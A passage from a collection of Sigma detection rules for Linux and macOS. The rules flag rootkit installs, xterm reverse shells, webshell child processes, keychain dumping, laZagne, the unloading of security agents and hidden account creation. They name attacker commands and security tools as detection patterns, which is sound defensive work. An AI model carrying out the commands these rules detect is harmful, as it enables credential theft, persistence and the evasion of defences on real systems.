network connections references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md author: Daniil Yugoslavskiy, oscd.community date: 2020-10-19 modified: 2023-01-17 tags: - attack.discovery - attack.t1049 logsource: category: process_creation product: linux detection: selection: Image|endswith: - '/who' - '/w' - '/last' - '/lsof' - '/netstat' filter_landscape_sysinfo: ParentCommandLine|contains: '/usr/bin/landscape-sysinfo' Image|endswith: '/who' condition: selection and not 1 of filter_* falsepositives: - Legitimate activities level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml ================================================ title: System Network Discovery - Linux id: e7bd1cfa-b446-4c88-8afb-403bcd79e3fa status: test description: Detects enumeration of local network configuration references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md author: Ömer Günal and remotephone, oscd.community date: 2020-10-06 modified: 2022-09-15 tags: - attack.discovery - attack.t1016 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: - '/firewall-cmd' - '/ufw' - '/iptables' - '/netstat' - '/ss' - '/ip' - '/ifconfig' - '/systemd-resolve' - '/route' selection_cli: CommandLine|contains: '/etc/resolv.conf' condition: 1 of selection_* falsepositives: - Legitimate administration activities level: informational ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_systemctl_mask_power_settings.yml ================================================ title: Mask System Power Settings Via Systemctl id: c172b7b5-f3a1-4af2-90b7-822c63df86cb status: experimental description: | Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or 
hybrid sleep. Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted. This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity. author: Milad Cheraghi, Nasreddine Bencherchali date: 2025-10-17 references: - https://www.man7.org/linux/man-pages/man1/systemctl.1.html - https://linux-audit.com/systemd/faq/what-is-the-difference-between-systemctl-disable-and-systemctl-mask/ tags: - attack.persistence - attack.impact - attack.t1653 logsource: category: process_creation product: linux detection: selection_systemctl: Image|endswith: '/systemctl' CommandLine|contains: ' mask' selection_power_options: CommandLine|contains: - 'suspend.target' - 'hibernate.target' - 'hybrid-sleep.target' condition: all of selection_* falsepositives: - Unlikely level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_touch_susp.yml ================================================ title: Touch Suspicious Service File id: 31545105-3444-4584-bebf-c466353230d2 status: test description: Detects usage of the "touch" process in service file. references: - https://blogs.blackberry.com/ - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-01-11 tags: - attack.defense-evasion - attack.t1070.006 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/touch' CommandLine|contains: ' -t ' CommandLine|endswith: '.service' condition: selection falsepositives: - Admin changing date of files. 
level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml ================================================ title: Triple Cross eBPF Rootkit Execve Hijack id: 0326c3c8-7803-4a0f-8c5c-368f747f7c3e status: test description: Detects execution of the file "execve_hijack", which is used by the Triple Cross rootkit as a way to elevate privileges references: - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 author: Nasreddine Bencherchali (Nextron Systems) date: 2022-07-05 tags: - attack.defense-evasion - attack.privilege-escalation logsource: category: process_creation product: linux detection: selection: Image|endswith: '/sudo' CommandLine|contains: 'execve_hijack' condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml ================================================ title: Triple Cross eBPF Rootkit Install Commands id: 22236d75-d5a0-4287-bf06-c93b1770860f status: test description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script references: - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh author: Nasreddine Bencherchali (Nextron Systems) date: 2022-07-05 tags: - attack.defense-evasion - attack.t1014 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/sudo' CommandLine|contains|all: - ' tc ' - ' enp0s3 ' CommandLine|contains: - ' qdisc ' - ' filter ' condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_userdel.yml ================================================ title: User Has Been Deleted Via Userdel id:
08f26069-6f80-474b-8d1f-d971c6fedea0 status: test description: Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks references: - https://linuxize.com/post/how-to-delete-group-in-linux/ - https://www.cyberciti.biz/faq/linux-remove-user-command/ - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/ - https://linux.die.net/man/8/userdel author: Tuan Le (NCSGroup) date: 2022-12-26 tags: - attack.impact - attack.t1531 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/userdel' condition: selection falsepositives: - Legitimate administrator activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml ================================================ title: User Added To Root/Sudoers Group Using Usermod id: 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73 status: test description: Detects usage of the "usermod" binary to add users to the root or sudoers groups references: - https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/ - https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/ author: TuanLe (GTSC) date: 2022-12-21 tags: - attack.privilege-escalation - attack.persistence logsource: product: linux category: process_creation detection: selection: Image|endswith: '/usermod' CommandLine|contains: - '-aG root' - '-aG sudoers' condition: selection falsepositives: - Legitimate administrator activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_vim_shell_execution.yml ================================================ title: Vim GTFOBin Abuse - Linux id: 7ab8f73a-fcff-428b-84aa-6a5ff7877dea status: test description: | Detects the use of "vim" and its sibling
commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. references: - https://gtfobins.github.io/gtfobins/vim/ - https://gtfobins.github.io/gtfobins/rvim/ - https://gtfobins.github.io/gtfobins/vimdiff/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022-12-28 modified: 2024-09-02 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: - '/rvim' - '/vim' - '/vimdiff' CommandLine|contains: - ' --cmd' - ' -c ' selection_cli: CommandLine|contains: - ':!/' - ':lua ' - ':py ' - '/bin/bash' - '/bin/dash' - '/bin/fish' - '/bin/sh' - '/bin/zsh' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml ================================================ title: Linux Webshell Indicators id: 818f7b24-0fba-4c49-a073-8b755573b9c7 status: test description: Detects suspicious sub processes of web server processes references: - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2021-10-15 modified: 2022-12-28 tags: - attack.persistence - attack.t1505.003 logsource: product: linux category: process_creation detection: selection_general: ParentImage|endswith: - '/httpd' - '/lighttpd' - '/nginx' - '/apache2' - '/node' - '/caddy' selection_tomcat: ParentCommandLine|contains|all: - '/bin/java' - 'tomcat' selection_websphere: # ? 
just guessing ParentCommandLine|contains|all: - '/bin/java' - 'websphere' sub_processes: Image|endswith: - '/whoami' - '/ifconfig' - '/ip' - '/bin/uname' - '/bin/cat' - '/bin/crontab' - '/hostname' - '/iptables' - '/netstat' - '/pwd' - '/route' condition: 1 of selection_* and sub_processes falsepositives: - Web applications that invoke Linux command line tools level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml ================================================ title: Download File To Potentially Suspicious Directory Via Wget id: cf610c15-ed71-46e1-bdf8-2bd1a99de6c4 status: test description: Detects the use of wget to download content to a suspicious directory references: - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-06-02 tags: - attack.command-and-control - attack.t1105 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/wget' selection_output: - CommandLine|re: '\s-O\s' # We use regex to ensure a case sensitive argument detection - CommandLine|contains: '--output-document' selection_path: CommandLine|contains: '/tmp/' condition: all of selection_* falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml ================================================ title: Potential Xterm Reverse Shell id: 4e25af4b-246d-44ea-8563-e42aacab006b status: test description: Detects usage of "xterm" as a potential reverse shell tunnel references: - 
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ author: '@d4ns4n_' date: 2023-04-24 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection: Image|contains: 'xterm' CommandLine|contains: '-display' CommandLine|endswith: ':1' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/macos/file_event/file_event_macos_emond_launch_daemon.yml ================================================ title: MacOS Emond Launch Daemon id: 23c43900-e732-45a4-8354-63e4a6c187ce status: test description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md - https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 author: Alejandro Ortuno, oscd.community date: 2020-10-23 modified: 2021-11-27 tags: - attack.persistence - attack.privilege-escalation - attack.t1546.014 logsource: category: file_event product: macos detection: selection_1: TargetFilename|contains: '/etc/emond.d/rules/' TargetFilename|endswith: '.plist' selection_2: TargetFilename|contains: '/private/var/db/emondClients/' condition: 1 of selection_* falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/macos/file_event/file_event_macos_susp_startup_item_created.yml ================================================ title: Startup Item File Created - MacOS id: dfe8b941-4e54-4242-b674-6b613d521962 status: test description: | Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence. Adversaries may use startup items automatically executed at boot initialization to establish persistence. 
Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md - https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html author: Alejandro Ortuno, oscd.community date: 2020-10-14 modified: 2024-08-11 tags: - attack.persistence - attack.privilege-escalation - attack.t1037.005 logsource: category: file_event product: macos detection: selection: TargetFilename|startswith: - '/Library/StartupItems/' - '/System/Library/StartupItems' TargetFilename|endswith: '.plist' condition: selection falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_applescript.yml ================================================ title: MacOS Scripting Interpreter AppleScript id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55 status: test description: Detects execution of AppleScript of the macOS scripting language AppleScript. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md - https://redcanary.com/blog/applescript/ author: Alejandro Ortuno, oscd.community date: 2020-10-21 modified: 2023-02-01 tags: - attack.execution - attack.t1059.002 logsource: category: process_creation product: macos detection: selection: Image|endswith: '/osascript' CommandLine|contains: - ' -e ' - '.scpt' - '.js' condition: selection falsepositives: - Application installers might contain scripts as part of the installation process. 
level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_base64_decode.yml ================================================ title: Decode Base64 Encoded Text -MacOs id: 719c22d7-c11a-4f2c-93a6-2cfdd5412f68 status: test description: Detects usage of the base64 utility to decode arbitrary base64-encoded text references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md author: Daniil Yugoslavskiy, oscd.community date: 2020-10-19 modified: 2022-11-26 tags: - attack.defense-evasion - attack.t1027 logsource: category: process_creation product: macos detection: selection: Image: '/usr/bin/base64' CommandLine|contains: '-d' condition: selection falsepositives: - Legitimate activities level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_binary_padding.yml ================================================ title: Binary Padding - MacOS id: 95361ce5-c891-4b0a-87ca-e24607884a96 status: test description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md - https://linux.die.net/man/1/truncate - https://linux.die.net/man/1/dd author: 'Igor Fits, Mikhail Larin, oscd.community' date: 2020-10-19 modified: 2023-02-17 tags: - attack.defense-evasion - attack.t1027.001 logsource: product: macos category: process_creation detection: selection_truncate: Image|endswith: '/truncate' CommandLine|contains: '-s +' selection_dd: Image|endswith: '/dd' CommandLine|contains: - 'if=/dev/zero' # if input is not /dev/zero, then there is no null padding - 'if=/dev/random' # high-quality random data - 'if=/dev/urandom' # low-quality random data condition: 1 of selection_* falsepositives: - Legitimate script work level: high ================================================ FILE: rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml ================================================ title: File Time Attribute Change id: 88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0 status: test description: Detects file time attribute changes made to hide new files or changes to existing files references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md author: Igor Fits, Mikhail Larin, oscd.community date: 2020-10-19 modified: 2022-01-12 tags: - attack.defense-evasion - attack.t1070.006 logsource: product: macos category: process_creation detection: selection: Image|endswith: '/touch' CommandLine|contains: - '-t' - '-acmr' - '-d' - '-r' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml ================================================ title: Hidden Flag Set On File/Directory Via Chflags - MacOS id: 3b2c1059-ae5f-40b6-b5d4-6106d3ac20fe status: test description: | Detects the execution of the "chflags" utility with 
the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. references: - https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/ - https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/ - https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf - https://ss64.com/mac/chflags.html author: Omar Khaled (@beacon_exe) date: 2024-08-21 tags: - attack.defense-evasion - attack.credential-access - attack.command-and-control - attack.t1218 - attack.t1564.004 - attack.t1552.001 - attack.t1105 logsource: product: macos category: process_creation detection: selection: Image|endswith: '/chflags' CommandLine|contains: 'hidden ' condition: selection falsepositives: - Legitimate usage of chflags by administrators and users. level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml ================================================ title: Indicator Removal on Host - Clear Mac System Logs id: acf61bd8-d814-4272-81f0-a7a269aa69aa status: test description: Detects deletion of local audit logs references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md author: remotephone, oscd.community date: 2020-10-11 modified: 2022-09-16 tags: - attack.defense-evasion - attack.t1070.002 logsource: product: macos category: process_creation detection: selection1: Image|endswith: - '/rm' - '/unlink' - '/shred' selection_cli_1: CommandLine|contains: '/var/log' selection_cli_2: CommandLine|contains|all: - '/Users/' - '/Library/Logs/' condition: selection1 and 1 of selection_cli* falsepositives: - Legitimate administration activities level: medium ================================================ FILE: 
rules/macos/process_creation/proc_creation_macos_clipboard_data_via_osascript.yml ================================================ title: Clipboard Data Collection Via OSAScript id: 7794fa3c-edea-4cff-bec7-267dd4770fd7 related: - id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55 type: derived status: test description: Detects possible collection of data from the clipboard via execution of the osascript binary references: - https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/ author: Sohan G (D4rkCiph3r) date: 2023-01-31 tags: - attack.collection - attack.execution - attack.t1115 - attack.t1059.002 logsource: product: macos category: process_creation detection: selection: CommandLine|contains|all: - 'osascript' - ' -e ' - 'clipboard' condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/macos/process_creation/proc_creation_macos_create_account.yml ================================================ title: Creation Of A Local User Account id: 51719bf5-e4fd-4e44-8ba8-b830e7ac0731 status: test description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md - https://ss64.com/osx/sysadminctl.html author: Alejandro Ortuno, oscd.community date: 2020-10-06 modified: 2023-02-18 tags: - attack.t1136.001 - attack.persistence logsource: category: process_creation product: macos detection: selection_dscl: Image|endswith: '/dscl' CommandLine|contains: 'create' selection_sysadminctl: Image|endswith: '/sysadminctl' CommandLine|contains: 'addUser' condition: 1 of selection_* falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml ================================================ title: Hidden User Creation id: b22a5b36-2431-493a-8be1-0bae56c28ef3 status: test description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md author: Daniil Yugoslavskiy, oscd.community date: 2020-10-10 modified: 2021-11-27 tags: - attack.defense-evasion - attack.t1564.002 logsource: category: process_creation product: macos detection: dscl_create: Image|endswith: '/dscl' CommandLine|contains: 'create' id_below_500: CommandLine|contains: UniqueID CommandLine|re: '([0-9]|[1-9][0-9]|[1-4][0-9]{2})' ishidden_option_declaration: CommandLine|contains: 'IsHidden' ishidden_option_confirmation: CommandLine|contains: - 'true' - 'yes' - '1' condition: dscl_create and id_below_500 or dscl_create and (ishidden_option_declaration and ishidden_option_confirmation) falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml ================================================ title: 
Credentials from Password Stores - Keychain id: b120b587-a4c2-4b94-875d-99c9807d6955 status: test description: Detects password dumps from the Keychain references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md - https://gist.github.com/Capybara/6228955 author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems) date: 2020-10-19 modified: 2021-11-27 tags: - attack.credential-access - attack.t1555.001 logsource: category: process_creation product: macos detection: selection1: Image: '/usr/bin/security' CommandLine|contains: - 'find-certificate' - ' export ' selection2: CommandLine|contains: - ' dump-keychain ' - ' login-keychain ' condition: 1 of selection* falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml ================================================ title: System Integrity Protection (SIP) Disabled id: 3603f18a-ec15-43a1-9af2-d196c8a7fec6 status: test description: | Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios. 
references: - https://ss64.com/osx/csrutil.html - https://objective-see.org/blog/blog_0x6D.html - https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/ - https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2024-01-02 tags: - attack.discovery - attack.t1518.001 logsource: product: macos category: process_creation detection: # VT Query: behavior_processes:"csrutil status" p:5+ type:mac selection: Image|endswith: '/csrutil' CommandLine|contains: 'disable' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_csrutil_status.yml ================================================ title: System Integrity Protection (SIP) Enumeration id: 53821412-17b0-4147-ade0-14faae67d54b status: test description: | Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios. 
references: - https://ss64.com/osx/csrutil.html - https://objective-see.org/blog/blog_0x6D.html - https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/ - https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2024-01-02 tags: - attack.discovery - attack.t1518.001 logsource: product: macos category: process_creation detection: # VT Query: behavior_processes:"csrutil status" p:5+ type:mac selection: Image|endswith: '/csrutil' CommandLine|contains: 'status' condition: selection falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml ================================================ title: Disable Security Tools id: ff39f1a6-84ac-476f-a1af-37fcdf53d7c0 status: test description: Detects disabling security tools references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Daniil Yugoslavskiy, oscd.community date: 2020-10-19 modified: 2021-11-27 tags: - attack.defense-evasion - attack.t1562.001 logsource: category: process_creation product: macos detection: launchctl_unload: Image: '/bin/launchctl' CommandLine|contains: 'unload' security_plists: CommandLine|contains: - 'com.objective-see.lulu.plist' # Objective-See firewall management utility - 'com.objective-see.blockblock.plist' # Objective-See persistence locations watcher/blocker - 'com.google.santad.plist' # google santa - 'com.carbonblack.defense.daemon.plist' # carbon black - 'com.carbonblack.daemon.plist' # carbon black - 'at.obdev.littlesnitchd.plist' # Objective Development Software firewall management utility - 'com.tenablesecurity.nessusagent.plist' # Tenable Nessus - 'com.opendns.osx.RoamingClientConfigUpdater.plist' # OpenDNS Umbrella - 
'com.crowdstrike.falcond.plist' # Crowdstrike Falcon - 'com.crowdstrike.userdaemon.plist' # Crowdstrike Falcon - 'osquery' # facebook osquery - 'filebeat' # elastic log file shipper - 'auditbeat' # elastic auditing agent/log shipper - 'packetbeat' # elastic network logger/shipper - 'td-agent' # fluentd log shipper disable_gatekeeper: Image: '/usr/sbin/spctl' CommandLine|contains: 'disable' condition: (launchctl_unload and security_plists) or disable_gatekeeper falsepositives: - Legitimate activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_dscl_add_user_to_admin_group.yml ================================================ title: User Added To Admin Group Via Dscl id: b743623c-2776-40e0-87b1-682b975d0ca5 related: - id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b type: obsolete status: test description: Detects attempts to create and add an account to the admin group via "dscl" references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos - https://ss64.com/osx/dscl.html author: Sohan G (D4rkCiph3r) date: 2023-03-19 tags: - attack.persistence - attack.defense-evasion - attack.initial-access - attack.privilege-escalation - attack.t1078.003 logsource: category: process_creation product: macos detection: selection: # adds to admin group Image|endswith: '/dscl' CommandLine|contains|all: - ' -append ' - ' /Groups/admin ' - ' GroupMembership ' condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml ================================================ title: User Added To Admin Group Via DseditGroup id: 5d0fdb62-f225-42fb-8402-3dfe64da468a status: test description: Detects attempts to create and/or add an account to the admin group, 
thus granting admin privileges. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos - https://ss64.com/osx/dseditgroup.html author: Sohan G (D4rkCiph3r) date: 2023-08-22 tags: - attack.persistence - attack.defense-evasion - attack.initial-access - attack.privilege-escalation - attack.t1078.003 logsource: category: process_creation product: macos detection: selection: Image|endswith: '/dseditgroup' CommandLine|contains|all: - ' -o edit ' # edit operation - ' -a ' # username - ' -t user' - 'admin' # Group name condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml ================================================ title: Root Account Enable Via Dsenableroot id: 821bcf4d-46c7-4b87-bc57-9509d3ba7c11 status: test description: Detects attempts to enable the root account via "dsenableroot" references: - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml - https://ss64.com/osx/dsenableroot.html author: Sohan G (D4rkCiph3r) date: 2023-08-22 tags: - attack.privilege-escalation - attack.defense-evasion - attack.t1078 - attack.t1078.001 - attack.t1078.003 - attack.initial-access - attack.persistence logsource: category: process_creation product: macos detection: selection: Image|endswith: '/dsenableroot' filter_main_disable: CommandLine|contains: ' -d ' condition: selection and not 1 of filter_main_* falsepositives: - Unknown level: medium ================================================ FILE: 
rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml ================================================ title: File and Directory Discovery - MacOS id: 089dbdf6-b960-4bcc-90e3-ffc3480c20f6 status: test description: Detects usage of system utilities to discover files and directories references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md author: Daniil Yugoslavskiy, oscd.community date: 2020-10-19 modified: 2022-11-25 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: macos detection: select_file_with_asterisk: Image: '/usr/bin/file' CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline select_recursive_ls: Image: '/bin/ls' CommandLine|contains: '-R' select_find_execution: Image: '/usr/bin/find' select_mdfind_execution: Image: '/usr/bin/mdfind' select_tree_execution|endswith: Image: '/tree' condition: 1 of select* falsepositives: - Legitimate activities level: informational ================================================ FILE: rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml ================================================ title: Credentials In Files id: 53b1b378-9b06-4992-b972-dde6e423d2b4 status: test description: Detects attempts to extract passwords with grep and laZagne references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md author: 'Igor Fits, Mikhail Larin, oscd.community' date: 2020-10-19 modified: 2021-11-27 tags: - attack.credential-access - attack.t1552.001 logsource: product: macos category: process_creation detection: selection1: Image|endswith: '/grep' CommandLine|contains: 'password' selection2: CommandLine|contains: 'laZagne' condition: 1 of selection* falsepositives: - Unknown level: high ================================================ FILE: 
rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml ================================================ title: GUI Input Capture - macOS id: 60f1ce20-484e-41bd-85f4-ac4afec2c541 status: test description: Detects attempts to use system dialog prompts to capture user credentials references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md - https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/ author: remotephone, oscd.community date: 2020-10-13 modified: 2025-12-05 tags: - attack.collection - attack.credential-access - attack.t1056.002 logsource: product: macos category: process_creation detection: selection_img: Image|endswith: '/osascript' selection_cli_1: CommandLine|contains|all: - '-e' - 'display' - 'dialog' - 'answer' selection_cli_2: CommandLine|contains: - 'admin' - 'administrator' - 'authenticate' - 'authentication' - 'credentials' - 'pass' - 'password' - 'unlock' condition: all of selection_* falsepositives: - Legitimate administration tools and activities level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml ================================================ title: Disk Image Creation Via Hdiutil - MacOS id: 1cf98dc2-fcb0-47c9-8aea-654c9284d1ae status: test description: Detects the execution of the hdiutil utility in order to create a disk image. references: - https://www.loobins.io/binaries/hdiutil/ - https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/ - https://ss64.com/mac/hdiutil.html author: Omar Khaled (@beacon_exe) date: 2024-08-10 tags: - attack.exfiltration logsource: product: macos category: process_creation detection: selection: Image|endswith: /hdiutil CommandLine|contains: 'create' condition: selection falsepositives: - Legitimate usage of hdiutil by administrators and users. 
level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml ================================================ title: Disk Image Mounting Via Hdiutil - MacOS id: bf241472-f014-4f01-a869-96f99330ca8c status: test description: Detects the execution of the hdiutil utility in order to mount disk images. references: - https://www.loobins.io/binaries/hdiutil/ - https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/ - https://ss64.com/mac/hdiutil.html author: Omar Khaled (@beacon_exe) date: 2024-08-10 tags: - attack.initial-access - attack.collection - attack.t1566.001 - attack.t1560.001 logsource: product: macos category: process_creation detection: selection: Image|endswith: /hdiutil CommandLine|contains: - 'attach ' - 'mount ' condition: selection falsepositives: - Legitimate usage of hdiutil by administrators and users. level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml ================================================ title: Suspicious Installer Package Child Process id: e0cfaecd-602d-41af-988d-f6ccebb2af26 status: test description: Detects the execution of suspicious child processes from macOS installer package parent process. 
